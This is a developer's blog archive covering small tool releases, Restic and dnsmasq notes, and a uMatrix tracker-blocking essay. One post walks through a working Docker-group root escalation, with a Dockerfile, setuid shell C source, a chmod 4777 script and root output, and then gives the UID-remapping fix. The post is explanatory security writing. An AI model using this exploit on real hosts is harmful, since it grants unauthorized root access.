Sunday, April 8th, 2018
Just a quick update on Multi-git-status. It now also shows branches with no upstream. These are typically branches created locally that haven't been configured to track a local or remote branch. Any changes in those branches are lost when the repo is removed from your machine. Additionally, multi-git-status now handles branches with slashes in them properly. For example, "feature/loginscreen". Here's how the output looks now:
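If you're curious how a branch "with no upstream" can be detected, git itself can show this. A small sketch using a throwaway repo (the branch name is borrowed from the example above; this is the general idea, not multi-git-status's actual code):

```shell
#!/bin/sh
# Create a throwaway repo with one branch that has no upstream configured.
set -e
repo=$(mktemp -d)
cd "$repo"
git init -q
git -c user.email=a@b -c user.name=t commit -q --allow-empty -m init
git branch feature/loginscreen   # a local branch, never pushed anywhere

# Print each branch and its upstream; an empty second field means the
# branch has no upstream and its commits exist only on this machine.
git for-each-ref --format='%(refname:short) %(upstream)' refs/heads/
```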
You can get multi-git-status from the Github page.
Sunday, March 18th, 2018
Here's a very quick note:
I've been using the Restic backup tool with the SFTP backend for a while now, and so far it's been great. Until I tried to prune some old backups, that is. It takes two hours to prune 1 GiB of data from a 15 GiB backup. During that time, you cannot create new backups. It also consumes a huge amount of bandwidth when deleting old backups. I strongly suspect it downloads each blob from the remote storage backend, repacks it and then writes it back.
I've seen people on the internet with a few hundred GiB worth of backups having to wait 7 days to delete their old backups. Since the repo is locked during that time, you cannot create new backups.
This makes Restic completely unusable as far as I'm concerned. Which is a shame, because other than that, it's an incredible tool.
Sunday, March 4th, 2018
I cobbled together a unixy command / application launcher and auto-typer. I've dubbed it Lurch.
- Fuzzy filtering as-you-type.
- Execute commands.
- Open new browser tabs.
- Auto-type into the currently focused window.
- Auto-type TOTP / rfc6238 / two-factor / Google Authenticator codes.
- Unixy and composable. Reads entries from stdin.
You can use and combine these features to do many things:
- Auto-type passwords
- Switch between currently opened windows by typing part of a window's title (using wmctrl to list and switch to windows).
- As a generic (and very customizable) application launcher by parsing .desktop entries or whatever.
- cd to parts of your filesystem using auto-type.
- Open browser tabs and search via google or specific search engines.
- List all entries in your SSH configuration and quickly launch an ssh session to one of them.
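As an example of the "unixy and composable" part, here's a sketch of turning an SSH config into launcher entries. The sample config below stands in for your real ~/.ssh/config, and piping the result into lurch is assumed to work as described above (entries read from stdin):

```shell
#!/bin/sh
# Build a sample SSH config (stands in for ~/.ssh/config).
cfg=$(mktemp)
cat > "$cfg" <<'EOF'
Host webserver
    HostName web.example.com
Host db*
    User admin
EOF

# Turn every concrete Host entry into an "ssh <host>" command line,
# skipping wildcard patterns like "db*".
awk 'tolower($1) == "host" && $2 !~ /[*?]/ {print "ssh " $2}' "$cfg"

# These lines could then be piped into the launcher, e.g.:
#   awk ... ~/.ssh/config | lurch
```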
You'll need a way to launch it when you press a keybinding. That's usually the window manager's job. For XFCE, you can add a keybinding under the Keyboard -> Application Shortcuts settings dialog.
Here's what it looks like:
Unfortunately, due to time constraints, I cannot provide any support for this project:
NO SUPPORT: There is absolutely ZERO support on this project. Due to time constraints, I don't take bug or features reports and probably won't accept your pull requests.
You can get it from the Github page.
Sunday, March 4th, 2018
I've added an "-e" argument to my multi-git-status project. It hides repositories that have no unpushed, untracked or uncommitted changes.
And with the "-e" argument:
Saturday, March 3rd, 2018
I've just released ansible-cmdb v1.26. Ansible-cmdb takes the output of Ansible's fact gathering and converts it into a static HTML overview page containing system configuration information. It supports multiple templates (fancy html, txt, markdown, json and sql) and extending information gathered by Ansible with custom data.
This release includes the following features and improvements:
- Custom and host local facts are now sorted by name
- Updates in the python packages that ansible-cmdb depends on.
- Improvements to the uninstall procedures.
The following bug fixes were made:
- Fixes in how columns are displayed
- Fixes in how custom and host local facts are parsed and displayed.
- Fixes in the markdown template that prevented rendering if there were no host vars.
- Various fixes in the html_fancy templates
- Several fixes that prevented ansible-cmdb from properly working on systems with only Python v3.x
- Bug fix in the RPM package that prevented installation on some Redhat / Centos versions.
You can get the release from the releases page (available in .deb, .rpm, .tar.gz and .whl), or you can install it via Pip:
sudo pip install ansible-cmdb
For more info and installation methods, please check the repository at github.
Saturday, October 21st, 2017
Because the basics underlying the web are insecure-by-design, it is possible for browsers to make requests to any website in the world from any website you decide to visit. This of course was quickly picked up by content publishers, the media and advertisers alike, to track your every move on the internet in order to shove more lukewarm shit down the throats of the average consumer.
The rise and fall of ad blockers
The answer to this came in the form of ad blockers: separate programs or extensions you install in your browser. They have a predefined list of ad domains that they'll block from loading. Naturally this upset the media and advertisers, some of whom equate it with stealing. One has to wonder if ignoring ads in the newspaper is also considered stealing. At any rate, it's hard to be sympathetic with the poor thirsty vampires in the advertising industry. They've shown again and again that they can't self-regulate. They'll go to great lengths to annoy you into buying their crap and to violate your privacy in the most horrible ways, all for a few extra eyeballs *.
For example, CNN's site loads resources from a staggering 61 domains. That's 61 places that can track you. 30 of those are known to track you and include Facebook, Google, a variety of specialized trackers, ad agencies, etc. It tries to run over 40 scripts and tries to place 8 cookies. And this is only from allowing scripts! I did not allow cross-site background requests or any of the blocked domains. I'm sure if I unblocked those, there would be much, much more.
To top it all off, advertisers have decided to go to the root of the problem, and have simply bought most ad blockers. These were then modified to let through certain "approved" ads. The sales pitch they give us is that they'll only allow nonintrusive ads. Kinda like a fifty-times convicted felon telling the parole board that he'll truly be good this time. In some cases they've even built tracking software directly in the ad blockers themselves. In other cases they're basically extorting money from websites in exchange for letting their ads through.
Bringing out the big guns
So… our ad blockers are being taken over by the enemy. Our browsers are highly insecure by default. Every site can send and retrieve data from any place on the web. Browsers can use our cameras, microphones and GPUs. The most recent addition is the ability to show notifications on our desktops. A feature that, surprise surprise, was quickly picked up by sites to shove more of their crap in our faces. Things are only going to get worse as browsers get more and more access to our PCs. The media has shown that they don't give a rat's ass about your privacy or rights as long as there's a few cents to make. The world's most-used browser is built by a company that lives off advertising. Have we lost the war? Do we just resign ourselves to the fact that we'll be tracked, spied upon, lied to, taken advantage of and spoon-fed advertisements like obedient little consumers every time we open a webpage?
Umatrix is like a firewall for your browser. It stops web pages from doing anything. They can't set cookies, they can't load CSS or images. They can't run scripts, use iframes or send data to themselves or to other sites. Umatrix blocks everything. Umatrix is what browsers should be doing by default. Ad blockers are just not enough. They only block ads and then only the ones they know about. To get any decent kind of protection of your privacy, you always needed at least an Adblocker, a privacy blocker such as Privacy Badger and a script blocker such as Noscript. Umatrix replaces all of those, and does a better job at it too.
Umatrix gives you full insight into what a website is trying to do. It gives you complete control over what a website is and isn't allowed to do. It has a bit of a learning curve, which is why I wrote a tutorial for it.
This is what a CNN article looks like with Umatrix enabled, allowing only first-party (*.cnn.com) CSS and images, which I have set as the default:
Look at that beauty. It's clean. It loads super fast. It cannot track me. It's free of ads, pop-ups, auto-playing videos, scripts and cookies. Remember, this didn't take any manual unblocking. This is just what it looks like out of the box with Umatrix.
Umatrix makes the web usable again.
Get it, install it, love it
Get it for Firefox, Chrome or Opera. Umatrix is Open Source, so it cannot be bought out by ad agencies.
Read my tutorial to get started with umatrix, as the learning curve is fairly steep.
Thanks for reading and safe browsing!
*) Someone will probably bring up the whole "but content creators should / need / deserve money too!" argument again. I'm not interested in discussions about that. They've had the chance to behave, and they've misbehaved time and time again. At some point, you don't trust the pathological liars anymore. No content creator switched to a more decent ad provider that doesn't fuck its customers over. The blame is on them, not on the people blocking their tracking, spying, attention-grabbing shit. Don't want me looking at your content for free? Put up a paywall. People won't come to your site anymore if you did that? Then maybe your content wasn't worth money in the first place.
Saturday, October 14th, 2017
I've just released ansible-cmdb v1.23. Ansible-cmdb takes the output of Ansible's fact gathering and converts it into a static HTML overview page containing system configuration information. It supports multiple templates (fancy html, txt, markdown, json and sql) and extending information gathered by Ansible with custom data.
This release includes the following changes:
- group_vars are now parsed.
- Sub directories in host_vars are now parsed.
- Addition of a --quiet switch to suppress warnings.
- Minor bugfixes and additions.
As always, packages are available for Debian, Ubuntu, Redhat, Centos and other systems. Get the new release from the Github releases page.
Saturday, September 30th, 2017
Disclaimer: There is no actual profit. That was just one of those clickbaity things everybody seems to like so much these days. Also, it's not really fun. Alright, on with the show!
A common practice is to add users that need to run Docker containers on your host to the docker group. For example, an automated build process may need a user on the target system to stop and recreate containers for testing or deployments. What is not obvious right away is that this is basically the same as giving those users root access. You see, the Docker daemon runs as root and when you add users to the docker group, they get full access over the Docker daemon.
So how hard is it to exploit this and become root on the host if you are a member of the docker group? Not very hard at all…
$ id
uid=1000(fboender) gid=1000(fboender) groups=1000(fboender),999(docker)
$ cd docker2root
$ docker build --rm -t docker2root .
$ docker run -v /tmp/persist:/persist docker2root:latest /bin/sh root.sh
uid=0(root) gid=1000(fboender) groups=1000(fboender),999(docker)
# ls -la /root
drwx------ 10 root root 4096 aug 1 10:32 .
drwxr-xr-x 25 root root 4096 sep 19 05:51 ..
-rw------- 1 root root 366 aug 3 09:26 .bash_history
So yeah, that took all of 3 seconds. I know I said 10 in the title, but the number 10 has special SEO properties. Remember, this is on the Docker host, not in a container or anything!
How does it work?
When you mount a volume into a container, that volume is mounted as root. By default, processes in a container also run as root. So all you have to do is write a setuid root owned binary to the volume, which will then appear as a setuid root binary on the host in that volume too.
Here's what the Dockerfile looks like:
FROM busybox
COPY root.sh root.sh
COPY rootshell rootshell
The rootshell file is a binary compiled from the following source code:

int main(void) {
    setuid( 0 );
    system( "/bin/sh" );
}
This isn't strictly needed, but most shells and many other programs refuse to run as a setuid binary.
The root.sh file simply copies the rootshell binary to the volume and sets the setuid bit on it:
cp rootshell /persist/rootshell
chmod 4777 /persist/rootshell
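If the setuid bit is unfamiliar, you can see what mode 4777 means without Docker at all. This throwaway demo just illustrates what the exploit writes to the volume (assumes GNU stat, i.e. Linux):

```shell
#!/bin/sh
# Show what mode 4777 (setuid + rwx for everyone) looks like on a file.
f=$(mktemp)
chmod 4777 "$f"
perms=$(stat -c '%A' "$f")
echo "$perms"   # the 's' in the owner slot is the setuid bit
rm -f "$f"
```

A binary with that bit set runs with its owner's privileges, so a root-owned rootshell on the host volume runs as root for anyone who executes it.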
Why I don't need to report this
I don't need to report this, because it is a well-known vulnerability. In fact, it's one of the less worrisome ones. There's plenty more, including all kinds of privilege escalation vulnerabilities from inside containers, etc. As far as I know, it hasn't been fixed in the latest Docker, nor will it be fixed in future versions. This is in line with the modern stance on security in the tech world: "security? What's that?" Docker goes so far as to call them "non-events". Newspeak if I ever heard it.
Some choice bullshit quotes from the Docker frontpage and documentation:
Secure by default: Easily build safer apps, ensure tamper-proof transit of all app components and run apps securely on the industry’s most secure container platform.
We want to ensure that Docker Enterprise Edition can be used in a manner that meets the requirements of various security and compliance standards.
Either that same courtesy does not extend to the community edition, security by default is no longer a requirement, or it's a completely false claim.
They do make some casual remarks about not giving access to the docker daemon to untrusted users in the Security section of the documentation:
only trusted users should be allowed to control your Docker daemon
However, they fail to mention that giving a user control of your Docker daemon is basically the same as giving them root access. Given that many companies are doing auto-deployments, and have probably given docker daemon access to a deployment user, your build server is now effectively also root on all your build slaves, dev, uat and perhaps even production systems.
Luckily, since Docker’s approach to secure by default through apparmor, seccomp, and dropping capabilities
3 seconds to get root on my host with a default Docker install doesn't look like "secure by default" to me. None of these options were enabled by default when I CURL-installed (!!&(@#!) Docker on my system, nor was I warned that I'd need to secure things manually.
How to fix this
There's a workaround available. It's hidden deep in the documentation and took me a while to find. Eventually some StackExchange discussion pointed me to a concept known as UID remapping (subuids). This uses the Linux namespaces capabilities to map the user IDs of users in a container to a different range on the host. For example, if you remap container UIDs to a range starting at 20000, then the root user (uid 0) in the container becomes uid 20000 on the host, uid 1 becomes uid 20001, etc.
You can read about how to manually (because docker is secure by default, remember) configure that on the Isolate containers with a user namespace documentation page.
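For reference, here's a minimal sketch of what that setup looks like. The "default" value and the dockremap user are the defaults from Docker's own documentation; verify the details against your Docker version:

```shell
# /etc/docker/daemon.json -- ask the daemon to remap container users:
#   { "userns-remap": "default" }
#
# Docker then uses subordinate ID ranges from /etc/subuid and /etc/subgid,
# entries of the form user:start-of-range:range-size, e.g.:
#   dockremap:100000:65536
#
# With that in place, uid 0 inside a container maps to uid 100000 on the
# host, so files written to a volume are no longer owned by the real root.
# Restart the daemon afterwards:
#   systemctl restart docker
```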
Saturday, September 23rd, 2017
This is gonna be a short post. I wrote a tool to change the background color of my terminal when I ssh to a machine. It works on Tilix and Xterm, but not on most other terminals, because they don't support the ANSI escape sequence for changing the background color. It works by combining SSH's LocalCommand option with a small Python script that parses the given hostname. Here's a short gif of it in action:
It's called sshbg.
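The trick itself is small enough to show. This is a sketch of the underlying idea, not sshbg's actual code: the OSC 11 escape sequence asks the terminal to change its background color (Xterm and Tilix honor it; most other terminals silently ignore it), and SSH's LocalCommand can fire it on connect. The host pattern and color here are made up for the example:

```shell
#!/bin/sh
# Ask the terminal to set its background to a dark red via OSC 11.
printf '\033]11;#331111\007'

# In ~/.ssh/config, LocalCommand can trigger something like this per host:
#   Host production*
#       PermitLocalCommand yes
#       LocalCommand printf '\033]11;#331111\007'
```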
Tuesday, September 19th, 2017
It appears that by default, DNS query caching is disabled in dnsmasq on Ubuntu 16.04. At least it is for my Xubuntu desktop. You can check if it's disabled for you with the dig command:
$ dig @127.0.1.1 ubuntu.com
$ dig @127.0.1.1 ubuntu.com
Yes, run it twice. Once to add the entry to the cache, the second time to verify it's cached.
Now check the "Query time" line. If it says anything higher than about 0 to 2 msec, caching is disabled.
;; Query time: 39 msec
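If you want to script this check, the query time is easy to pull out of dig's output with awk. A minimal sketch; the sample line below stands in for real dig output, so the number is only illustrative:

```shell
#!/bin/sh
# Extract the query time (in msec) from dig's "Query time" line. The sample
# stands in for the output of a real "dig @127.0.1.1 ubuntu.com" run.
sample=';; Query time: 39 msec'
qt=$(printf '%s\n' "$sample" | awk '/Query time/ {print $4}')
echo "Query took ${qt} msec"
# With caching enabled, a second identical query should report ~0 msec.
if [ "$qt" -le 2 ]; then
    echo "caching appears enabled"
else
    echo "caching appears disabled"
fi
```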
To enable it, create a new file /etc/NetworkManager/dnsmasq.d/cache.conf and put the following in it:

cache-size=1000
Next, restart the network manager:
systemctl restart network-manager
Now try the dig again twice and check the Query time. It should be zero or close to zero. DNS queries are now cached, which should make browsing a bit faster; in some cases a lot faster. An additional benefit is that many ISPs' modems / routers and DNS servers are horrible, which local DNS caching somewhat mitigates.
The text of all posts on this blog, unless specifically mentioned otherwise, is licensed under this license.